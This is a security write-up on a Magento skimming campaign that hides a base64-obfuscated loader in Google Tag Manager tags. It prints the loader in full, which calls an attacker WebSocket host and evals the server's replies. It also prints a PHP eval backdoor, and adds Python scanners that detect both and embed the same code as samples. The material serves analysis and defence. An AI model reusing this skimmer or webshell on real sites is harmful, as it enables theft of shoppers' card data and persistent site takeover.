Hackers have been exploiting Google Tag Manager (GTM) to steal sensitive credit card information from eCommerce sites, particularly those built on the Magento platform.
This sophisticated attack shows the evolving tactics of cybercriminals in leveraging legitimate tools for malicious purposes.
Google Tag Manager is a free tool provided by Google that allows website owners to manage and deploy marketing tags without needing to modify the site’s code directly.
Researchers at Sucuri noted that it simplifies adding and updating tags for tools such as Google Analytics, AdWords, and Facebook Pixel, making it easier for marketers to track website activity and optimize campaigns. That same convenience is what makes GTM attractive to attackers: a tag container can push arbitrary JavaScript onto every page, checkout included, without any change to the site's own files.
The Malware Attack
The attack involves embedding malicious code within the GTM tags, which are designed to appear legitimate at first glance.
However, upon closer inspection, these scripts are found to be collecting sensitive data entered by users during the checkout process and sending it to a remote server controlled by the attackers.
The malicious code often appears as a standard GTM and Google Analytics tracking script but contains encoded JavaScript payloads that act as credit card skimmers. For instance (comments added to the sample):
(function(i, s, h, k, l, o, c, m) {
    // decoy: stores the base64 string under a GA-looking global name
    m['GoogleAnalyticsObjects'] = o;
    c = s.createElement(h), i = s.getElementsByTagName(h)[0];
    // o decodes to "checkout": the loader only fires on checkout pages
    if (l.href.match(new RegExp(atob(o)))) {
        c.async = 1;
        // k decodes to the payload; new Function(...).call() runs it immediately.
        // The <script> element c is never appended, so c.src is just cosmetic
        c.src = new Function(atob(k)).call(this);
    }
})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2V1cm93ZWJtb25pdG9ydG9vbC5jb20vY29tbW9uP3NvdXJjZT0nKSArIGVuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5ocmVmKSk7d2luZG93Lnd3Lm9ubWVzc2FnZT1mdW5jdGlvbihlKXtldmFsKGUuZGF0YSk7fQ==', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);
This code uses Base64 encoding and obfuscation to disguise its purpose, but both strings decode trivially. The split literal 'Y2hlY2tvdXQ' + '=' decodes to checkout, so the loader only runs on checkout pages, which also keeps it out of sight on every other page an analyst might test. The long string decodes to:
window.ww = new WebSocket(('wss://eurowebmonitortool.com/common?source=') + encodeURIComponent(location.href));window.ww.onmessage=function(e){eval(e.data);}
That is, it opens a WebSocket to the attacker's server with the current page URL as a parameter and passes every message the server sends to eval(). The skimming logic itself is never stored in the tag; it is delivered live over the socket, so the operator can change it at will without touching the GTM container. Note also that new Function(atob(k)).call(this) executes the payload directly; the created <script> element is never appended to the page, and setting window.GoogleAnalyticsObjects is only a decoy.
In addition to the GTM malware, a backdoor was discovered in the ./media/index.php file. This backdoor could be exploited to further infect the site, providing attackers with persistent access: as long as it remains, removing the malicious GTM tag alone does not evict the attacker.
Backdoor code:
<?php
// Read a request parameter (GET, POST or cookie) with a fallback value
function get_data($param, $default) {
    $total = $_REQUEST;
    if(isset($total[$param])) {
        return $total[$param];
    } else {
        return $default;
    }
}

// Gate: only respond when the sha256 of the "item" parameter contains this
// hard-coded fragment, a password only the attacker knows; scanners and
// curious visitors that hit the file without it get an empty reply
function get_cli() {
    if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )
        return "";
    $param_name = "order";
    $data = get_data($param_name, "");
    return $data;
}

// Whatever arrives in the "order" parameter is executed as PHP
$cli = get_cli();
eval($cli);
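Hunting for this backdoor on disk, as an added example that is not part of the article or of Sucuri's tooling: the scanner below walks a Magento document root, flags PHP files that combine request input, a hash gate and eval(), and adds weight when a file sits under an upload directory such as media/, where no PHP belongs at all. The indicator list, the directory list and the scoring weights are assumptions; the sample tree it builds is constructed from the backdoor quoted above plus one harmless helper that also reads request input and calls hash(), to show that a single indicator does not trigger a finding.

```python
import re
import tempfile
from pathlib import Path

# Source-level indicators for the backdoor shape quoted above: request input
# reaching eval() behind a hash "password" check. The list is an assumption.
PHP_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "request_input": re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b"),
    "hash_gate": re.compile(r"\bhash\s*\(\s*['\"](?:sha256|sha1|md5)['\"]"),
    "exec_sink": re.compile(r"\b(?:system|passthru|shell_exec|create_function|assert)\s*\("),
}

# Assumption: these Magento directories hold uploads and runtime data, so any
# .php file beneath them is suspicious on location alone.
UPLOAD_DIRS = ("media", "pub/media", "var")


def scan_php_file(root: Path, path: Path) -> dict:
    """Score one PHP file by indicator hits and by where it lives."""
    rel = path.relative_to(root).as_posix()
    src = path.read_text(errors="replace")
    hits = [name for name, rx in PHP_INDICATORS.items() if rx.search(src)]
    in_upload_dir = any(rel.startswith(d + "/") for d in UPLOAD_DIRS)
    score = len(hits)
    if {"eval", "request_input"} <= set(hits):
        score += 2  # request data reaching eval() is the webshell core
    if in_upload_dir:
        score += 2
    return {"path": rel, "indicators": hits,
            "in_upload_dir": in_upload_dir, "score": score}


def scan_tree(root: Path, min_score: int = 3) -> list:
    """Return every PHP file at or above min_score, worst first."""
    results = (scan_php_file(root, p) for p in root.rglob("*.php"))
    return sorted((r for r in results if r["score"] >= min_score),
                  key=lambda r: -r["score"])


# Constructed sample tree: the backdoor quoted above dropped into media/, plus
# a harmless helper that also reads request input and calls hash().
BACKDOOR_PHP = """<?php
function get_data($param, $default) {
    $total = $_REQUEST;
    if(isset($total[$param])) { return $total[$param]; } else { return $default; }
}
function get_cli() {
    if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )
        return "";
    return get_data("order", "");
}
$cli = get_cli();
eval($cli);
"""

BENIGN_PHP = """<?php
function cache_key() {
    return hash('sha256', $_GET['q'] ?? '');
}
"""


def build_sample_tree() -> Path:
    """Write the constructed files into a fresh temp directory and return its root."""
    root = Path(tempfile.mkdtemp(prefix="magento-"))
    (root / "media").mkdir()
    (root / "media" / "index.php").write_text(BACKDOOR_PHP)
    helper = root / "app" / "code" / "Vendor" / "Module" / "Helper"
    helper.mkdir(parents=True)
    (helper / "Data.php").write_text(BENIGN_PHP)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f["score"], f["path"], ", ".join(f["indicators"]))
```

On a real site point scan_tree at the document root and review anything it returns by hand; the location rule alone will surface dropped shells that use none of the listed functions, which is why it is weighted as heavily as the eval() pairing.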
To protect against such attacks, website administrators should regularly review their GTM containers, confirming that every tag (Custom HTML tags in particular, since they can carry arbitrary JavaScript) is legitimate and was published by authorized personnel, and should limit GTM publish rights to the few accounts that need them.
They should also audit the site's files for suspicious scripts and backdoors (PHP files under upload directories such as media/ deserve particular attention), use security tools such as website firewalls and malware detection systems, and keep all software updated by ensuring that all plugins and platforms are current.
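The tag review above and the base64 deobfuscation of the loader shown earlier can both be scripted. The following is an added example, not code from the article or from Sucuri, that scans a GTM container export (the JSON produced by GTM's container export) for Custom HTML tags, rejoins split string literals such as 'Y2hlY2tvdXQ' + '=', decodes every base64-looking literal, and scores each tag by the behaviours the skimmer relies on (a WebSocket to a third party, eval of server messages, a checkout gate, exfiltration of the page URL), counting a behaviour twice when it only appears after decoding. The export layout, the eight-character minimum for base64 candidates, the indicator list and the scoring weights are assumptions; the constructed sample export contains one benign gtag snippet and the loader quoted earlier in the article.

```python
import base64
import json
import re

# Assumed GTM container export layout (check it against your own export):
# {"containerVersion": {"tag": [{"name": ..., "type": "html",
#   "parameter": [{"key": "html", "value": "<script>...</script>"}]}]}}
# Custom HTML tags are where a skimmer hides, so only those are scanned.

# Quoted runs of base64 alphabet long enough to hide something (8+ chars).
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{8,}={0,2})\1""")

# Behaviours worth flagging in a "tracking" tag (assumed list). In plain text
# they are weak signals; visible only after base64 decoding they are strong.
INDICATORS = {
    "websocket": re.compile(r"\bnew\s+WebSocket\s*\(|wss?://"),
    "eval": re.compile(r"\beval\s*\("),
    "dynamic_function": re.compile(r"\bnew\s+Function\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "exfil_page_url": re.compile(r"encodeURIComponent\s*\(\s*location\.href"),
    "checkout_gate": re.compile(r"\bcheckout\b"),
}


def try_decode_b64(literal: str):
    """Return decoded text if `literal` is valid base64 for printable text, else None."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    text = raw.decode("utf-8", errors="replace")
    if text and all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def analyze_html_tag(src: str) -> dict:
    """Decode hidden literals in one tag body and score its indicators."""
    # Skimmers split literals ('Y2hlY2tvdXQ' + '=') to dodge naive grep;
    # glue adjacent string concatenations back together first.
    joined = re.sub(r"""(['"])\s*\+\s*\1""", "", src)
    decoded = {}
    for m in B64_LITERAL.finditer(joined):
        text = try_decode_b64(m.group(2))
        if text is not None:
            decoded[m.group(2)] = text
    raw = [n for n, rx in INDICATORS.items() if rx.search(joined)]
    hidden = sorted({n for t in decoded.values()
                     for n, rx in INDICATORS.items() if rx.search(t)})
    return {"decoded": decoded, "raw_indicators": raw,
            "hidden_indicators": hidden, "score": len(raw) + 2 * len(hidden)}


def scan_container(export_json: str) -> list:
    """Analyze every Custom HTML tag in a container export, worst first."""
    container = json.loads(export_json)
    results = []
    for tag in container.get("containerVersion", {}).get("tag", []):
        if tag.get("type") != "html":
            continue
        html = next((p.get("value", "") for p in tag.get("parameter", [])
                     if p.get("key") == "html"), "")
        result = analyze_html_tag(html)
        result["tag"] = tag.get("name", "<unnamed>")
        results.append(result)
    return sorted(results, key=lambda r: -r["score"])


# Constructed sample export: a benign gtag snippet (placeholder measurement ID)
# and the loader quoted in the article above.
BENIGN_TAG = """<script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date()); gtag('config', 'G-ABC123');</script>"""

SKIMMER_TAG = """<script>(function(i, s, h, k, l, o, c, m) {
m['GoogleAnalyticsObjects'] = o;
c = s.createElement(h), i = s.getElementsByTagName(h)[0];
if (l.href.match(new RegExp(atob(o)))) {
c.async = 1;
c.src = new Function(atob(k)).call(this);
}
})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2V1cm93ZWJtb25pdG9ydG9vbC5jb20vY29tbW9uP3NvdXJjZT0nKSArIGVuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5ocmVmKSk7d2luZG93Lnd3Lm9ubWVzc2FnZT1mdW5jdGlvbihlKXtldmFsKGUuZGF0YSk7fQ==', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);</script>"""

SAMPLE_EXPORT = json.dumps({
    "exportFormatVersion": 2,
    "containerVersion": {"tag": [
        {"name": "GA4 configuration", "type": "html",
         "parameter": [{"type": "TEMPLATE", "key": "html", "value": BENIGN_TAG}]},
        {"name": "Analytics tracking", "type": "html",
         "parameter": [{"type": "TEMPLATE", "key": "html", "value": SKIMMER_TAG}]},
    ]},
})

if __name__ == "__main__":
    for r in scan_container(SAMPLE_EXPORT):
        print(r["score"], r["tag"], r["raw_indicators"], r["hidden_indicators"])
        for lit, text in r["decoded"].items():
            print("   ", lit[:24], "->", text[:80])
```

Run it against a fresh export after every suspected incident and, better, on a schedule against the published container version; a tag whose only "analytics" behaviour appears after decoding should be treated as hostile until someone can say who added it.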